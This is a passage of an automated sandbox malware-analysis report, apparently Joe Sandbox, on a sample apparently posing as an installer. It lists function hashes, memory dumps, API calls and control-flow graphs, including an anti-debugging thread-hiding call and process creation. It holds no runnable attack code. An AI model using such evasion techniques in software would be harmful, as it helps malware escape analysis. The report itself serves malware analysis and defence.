                              • Opcode Fuzzy Hash: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                              • Instruction Fuzzy Hash: B551B171106B018FC320CF29C480795B7F3BF96314F6A8B5DC0E65BA95DB75B48A8B91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                              • Instruction ID: 784c0950dd5aff4f5050fef9b2b44ff865f6615f436b5e5ff7198ae5d959b195
                              • Opcode Fuzzy Hash: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                              • Instruction Fuzzy Hash: 0131F431246B018FD320CF28C8847C6B7B3BF96314F6A4E1DC0E65BA95DB7974899B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                              • Instruction ID: c637544a3079c8e3785592db6f36986e6af9aefb4f1c66172b2307674b55c9a2
                              • Opcode Fuzzy Hash: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                              • Instruction Fuzzy Hash: 4A31D131105B018BD724CF28C490796B7B6BF96304F6A4E1DC0EA5BA85DB757489CB52
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                              • Instruction ID: d5559aa2033020262841fb1cd4a4f5081011143d227c8de3dc873339ad711a8d
                              • Opcode Fuzzy Hash: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                              • Instruction Fuzzy Hash: C72106702197028BD324CF28C89079677B6BF46304F5A4E1DD0E69BAD4DB75B4898B52
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC55130
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                              • Instruction ID: 308a43dc430a5e52b453cbf742fcde67d9bfdf241443d871339a8aad86eb2617
                              • Opcode Fuzzy Hash: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                              • Instruction Fuzzy Hash: D03145B4608301EFC7108F29C584B4BBFF0BB89764F90895AF988C6360D331D8689B67
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6CC4AEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                              • Instruction ID: 982a7148b7169c0573e7d8bebb8b243c9860660beb2c3e546c639f3114bfe660
                              • Opcode Fuzzy Hash: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                              • Instruction Fuzzy Hash: 111136B4508351AFE7108F29D54491EBBE4BFC6314F14CE69F4A8CB691E330CC858B22
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC2ABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                              • Instruction ID: 5f5d3232215e7873e3024ebdd922f8c45fa8327fe64bc1769490f90ab70ac6a3
                              • Opcode Fuzzy Hash: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                              • Instruction Fuzzy Hash: 5762487060D3818FC724CF29C490A5ABBE2ABD9314F248D5EE99ACB751E739D845CB43

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6cc6cad3-6cc6cae3 6825 6cc6cae5-6cc6caf8 call 6cc5f9df call 6cc5f9cc 6824->6825 6826 6cc6cafd-6cc6caff 6824->6826 6843 6cc6ce7c 6825->6843 6828 6cc6ce64-6cc6ce71 call 6cc5f9df call 6cc5f9cc 6826->6828 6829 6cc6cb05-6cc6cb0b 6826->6829 6848 6cc6ce77 call 6cc60120 6828->6848 6829->6828 6832 6cc6cb11-6cc6cb37 6829->6832 6832->6828 6835 6cc6cb3d-6cc6cb46 6832->6835 6838 6cc6cb60-6cc6cb62 6835->6838 6839 6cc6cb48-6cc6cb5b call 6cc5f9df call 6cc5f9cc 6835->6839 6841 6cc6ce60-6cc6ce62 6838->6841 6842 6cc6cb68-6cc6cb6b 6838->6842 6839->6848 6846 6cc6ce7f-6cc6ce82 6841->6846 6842->6841 6847 6cc6cb71-6cc6cb75 6842->6847 6843->6846 6847->6839 6850 6cc6cb77-6cc6cb8e 6847->6850 6848->6843 6853 6cc6cb90-6cc6cb93 6850->6853 6854 6cc6cbdf-6cc6cbe5 6850->6854 6857 6cc6cb95-6cc6cb9e 6853->6857 6858 6cc6cba3-6cc6cba9 6853->6858 6855 6cc6cbe7-6cc6cbf1 6854->6855 6856 6cc6cbab-6cc6cbc2 call 6cc5f9df call 6cc5f9cc call 6cc60120 6854->6856 6859 6cc6cbf3-6cc6cbf5 6855->6859 6860 6cc6cbf8-6cc6cc16 call 6cc647f5 call 6cc647bb * 2 6855->6860 6888 6cc6cd97 6856->6888 6861 6cc6cc63-6cc6cc73 6857->6861 6858->6856 6862 6cc6cbc7-6cc6cbda 6858->6862 6859->6860 6898 6cc6cc33-6cc6cc5c call 6cc6ac69 6860->6898 6899 6cc6cc18-6cc6cc2e call 6cc5f9cc call 6cc5f9df 6860->6899 6864 6cc6cd38-6cc6cd41 call 6cc719e5 6861->6864 6865 6cc6cc79-6cc6cc85 6861->6865 6862->6861 6877 6cc6cdb4 6864->6877 6878 6cc6cd43-6cc6cd55 6864->6878 6865->6864 6869 6cc6cc8b-6cc6cc8d 6865->6869 6869->6864 6873 6cc6cc93-6cc6ccb7 6869->6873 6873->6864 6879 6cc6ccb9-6cc6cccf 6873->6879 6881 6cc6cdb8-6cc6cdd0 ReadFile 6877->6881 6878->6877 6883 6cc6cd57-6cc6cd66 GetConsoleMode 6878->6883 6879->6864 6884 6cc6ccd1-6cc6ccd3 6879->6884 6886 6cc6cdd2-6cc6cdd8 6881->6886 6887 6cc6ce2c-6cc6ce37 GetLastError 6881->6887 6883->6877 6889 6cc6cd68-6cc6cd6c 6883->6889 6884->6864 6890 6cc6ccd5-6cc6ccfb 6884->6890 6886->6887 6894 6cc6cdda 6886->6894 6892 6cc6ce50-6cc6ce53 6887->6892 6893 6cc6ce39-6cc6ce4b call 6cc5f9cc call 6cc5f9df 6887->6893 6896 6cc6cd9a-6cc6cda4 call 6cc647bb 6888->6896 6889->6881 6895 6cc6cd6e-6cc6cd88 ReadConsoleW 6889->6895 6890->6864 6897 6cc6ccfd-6cc6cd13 6890->6897 6905 6cc6cd90-6cc6cd96 call 6cc5f9f2 6892->6905 6906 6cc6ce59-6cc6ce5b 6892->6906 6893->6888 6901 6cc6cddd-6cc6cdef 6894->6901 6903 6cc6cd8a GetLastError 6895->6903 6904 6cc6cda9-6cc6cdb2 6895->6904 6896->6846 6897->6864 6908 6cc6cd15-6cc6cd17 6897->6908 6898->6861 6899->6888 6901->6896 6911 6cc6cdf1-6cc6cdf5 6901->6911 6903->6905 6904->6901 6905->6888 6906->6896 6908->6864 6915 6cc6cd19-6cc6cd33 6908->6915 6919 6cc6cdf7-6cc6ce07 call 6cc6cefe 6911->6919 6920 6cc6ce0e-6cc6ce19 6911->6920 6915->6864 6930 6cc6ce0a-6cc6ce0c 6919->6930 6925 6cc6ce25-6cc6ce2a call 6cc6d1b6 6920->6925 6926 6cc6ce1b call 6cc6ce83 6920->6926 6931 6cc6ce20-6cc6ce23 6925->6931 6926->6931 6930->6896 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                              • Instruction ID: 95eb498d23126834f8adfd521a233fe94cd868d61c7f22007d90f928b16ef090
                              • Opcode Fuzzy Hash: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                              • Instruction Fuzzy Hash: F8C11670E04249AFEF01DFAAC9C0BADBBB4BF4A318F50418AE514A7F41E7709945CB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6cc7406c-6cc7409c call 6cc744ec 6936 6cc740b7-6cc740c3 call 6cc7160c 6933->6936 6937 6cc7409e-6cc740a9 call 6cc5f9df 6933->6937 6942 6cc740c5-6cc740da call 6cc5f9df call 6cc5f9cc 6936->6942 6943 6cc740dc-6cc74125 call 6cc74457 6936->6943 6944 6cc740ab-6cc740b2 call 6cc5f9cc 6937->6944 6942->6944 6952 6cc74127-6cc74130 6943->6952 6953 6cc74192-6cc7419b GetFileType 6943->6953 6954 6cc74391-6cc74395 6944->6954 6958 6cc74167-6cc7418d GetLastError call 6cc5f9f2 6952->6958 6959 6cc74132-6cc74136 6952->6959 6955 6cc741e4-6cc741e7 6953->6955 6956 6cc7419d-6cc741ce GetLastError call 6cc5f9f2 CloseHandle 6953->6956 6962 6cc741f0-6cc741f6 6955->6962 6963 6cc741e9-6cc741ee 6955->6963 6956->6944 6970 6cc741d4-6cc741df call 6cc5f9cc 6956->6970 6958->6944 6959->6958 6964 6cc74138-6cc74165 call 6cc74457 6959->6964 6967 6cc741fa-6cc74248 call 6cc717b0 6962->6967 6968 6cc741f8 6962->6968 6963->6967 6964->6953 6964->6958 6975 6cc74267-6cc7428f call 6cc74710 6967->6975 6976 6cc7424a-6cc74256 call 6cc74666 6967->6976 6968->6967 6970->6944 6983 6cc74294-6cc742d5 6975->6983 6984 6cc74291-6cc74292 6975->6984 6976->6975 6982 6cc74258 6976->6982 6985 6cc7425a-6cc74262 call 6cc6b925 6982->6985 6986 6cc742d7-6cc742db 6983->6986 6987 6cc742f6-6cc74304 6983->6987 6984->6985 6985->6954 6986->6987 6989 6cc742dd-6cc742f1 6986->6989 6990 6cc7438f 6987->6990 6991 6cc7430a-6cc7430e 6987->6991 6989->6987 6990->6954 6991->6990 6992 6cc74310-6cc74343 CloseHandle call 6cc74457 6991->6992 6996 6cc74377-6cc7438b 6992->6996 6997 6cc74345-6cc74371 GetLastError call 6cc5f9f2 call 6cc7171f 6992->6997 6996->6990 6997->6996
                              APIs
                                • Part of subcall function 6CC74457: CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC74180
                              • __dosmaperr.LIBCMT ref: 6CC74187
                              • GetFileType.KERNEL32(00000000), ref: 6CC74193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7419D
                              • __dosmaperr.LIBCMT ref: 6CC741A6
                              • CloseHandle.KERNEL32(00000000), ref: 6CC741C6
                              • CloseHandle.KERNEL32(6CC6B0D0), ref: 6CC74313
                              • GetLastError.KERNEL32 ref: 6CC74345
                              • __dosmaperr.LIBCMT ref: 6CC7434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                              • Instruction ID: b438bed974e4e02bfa46ef60451f853d93095e8451da6d3908692b3133466af5
                              • Opcode Fuzzy Hash: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                              • Instruction Fuzzy Hash: 5FA16932A045449FDF19DF78C851BAE7BB4EB07328F180289E815EF780EB359816CB61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6cc2c1e0-6cc2c239 call 6cc56b70 7005 6cc2c260-6cc2c269 7002->7005 7006 6cc2c2b0-6cc2c2b5 7005->7006 7007 6cc2c26b-6cc2c270 7005->7007 7008 6cc2c330-6cc2c335 7006->7008 7009 6cc2c2b7-6cc2c2bc 7006->7009 7010 6cc2c272-6cc2c277 7007->7010 7011 6cc2c2f0-6cc2c2f5 7007->7011 7016 6cc2c33b-6cc2c340 7008->7016 7017 6cc2c489-6cc2c4b9 call 6cc5b3a0 7008->7017 7012 6cc2c2c2-6cc2c2c7 7009->7012 7013 6cc2c407-6cc2c41b 7009->7013 7018 6cc2c372-6cc2c3df WriteFile 7010->7018 7019 6cc2c27d-6cc2c282 7010->7019 7014 6cc2c431-6cc2c448 WriteFile 7011->7014 7015 6cc2c2fb-6cc2c300 7011->7015 7023 6cc2c23b-6cc2c250 7012->7023 7024 6cc2c2cd-6cc2c2d2 7012->7024 7022 6cc2c41f-6cc2c42c 7013->7022 7025 6cc2c452-6cc2c47f call 6cc5b920 ReadFile 7014->7025 7015->7025 7026 6cc2c306-6cc2c30b 7015->7026 7028 6cc2c346-6cc2c36d 7016->7028 7029 6cc2c4be-6cc2c4c3 7016->7029 7017->7005 7021 6cc2c3e9-6cc2c3fd WriteFile 7018->7021 7020 6cc2c288-6cc2c28d 7019->7020 7019->7021 7020->7005 7030 6cc2c28f-6cc2c2aa 7020->7030 7021->7013 7022->7005 7034 6cc2c253-6cc2c258 7023->7034 7024->7005 7031 6cc2c2d4-6cc2c2e7 7024->7031 7025->7017 7026->7005 7033 6cc2c311-6cc2c32b 7026->7033 7028->7034 7029->7005 7036 6cc2c4c9-6cc2c4d7 7029->7036 7030->7034 7031->7034 7033->7022 7034->7005
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                              • Instruction ID: b2a247bb0735d1ffb2a4393c01af9b5ace0a971587068865973efcaf29b040f4
                              • Opcode Fuzzy Hash: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                              • Instruction Fuzzy Hash: 25716CB0208345AFE710DF55C880BABBBF4FF8A708F10492EF498D6651E775D8589B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                              • Instruction ID: a44e052a5ece2cdfafd90f17ebf65e2684f10258098b36820e032a32bc644f89
                              • Opcode Fuzzy Hash: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                              • Instruction Fuzzy Hash: 064245B86093428FD754CF19C0A0A5ABBE1AFC9314F248D1EE5E6C7B21E638D845CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                              • Instruction ID: 31a5a95c3efa9f2711f1ac14222f42e539cd1ad957b0f9bb1191c0d9416b5f0c
                              • Opcode Fuzzy Hash: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                              • Instruction Fuzzy Hash: 2303D471645B018FC728CF28C8D0695B7E3EFD532471D8B6DC0AA4BA95DB74B48ACB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6cc54ff0-6cc55077 CreateProcessA 7580 6cc550ca-6cc550d3 7579->7580 7581 6cc550d5-6cc550da 7580->7581 7582 6cc550f0-6cc5510b 7580->7582 7583 6cc55080-6cc550c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6cc550dc-6cc550e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6cc550e3-6cc55118 7584->7585
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                              • Instruction ID: 86b314e4bb4218fa762bbd67af1dcab7ee8a835b9abd496f1f7d122ed4197100
                              • Opcode Fuzzy Hash: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                              • Instruction Fuzzy Hash: D63103708193408FE740DF29C19872ABBF0EB9A318F805A1DF4D986250E775D5A9CF47

                              Control-flow Graph

                              • Executed
                              • Not Executed
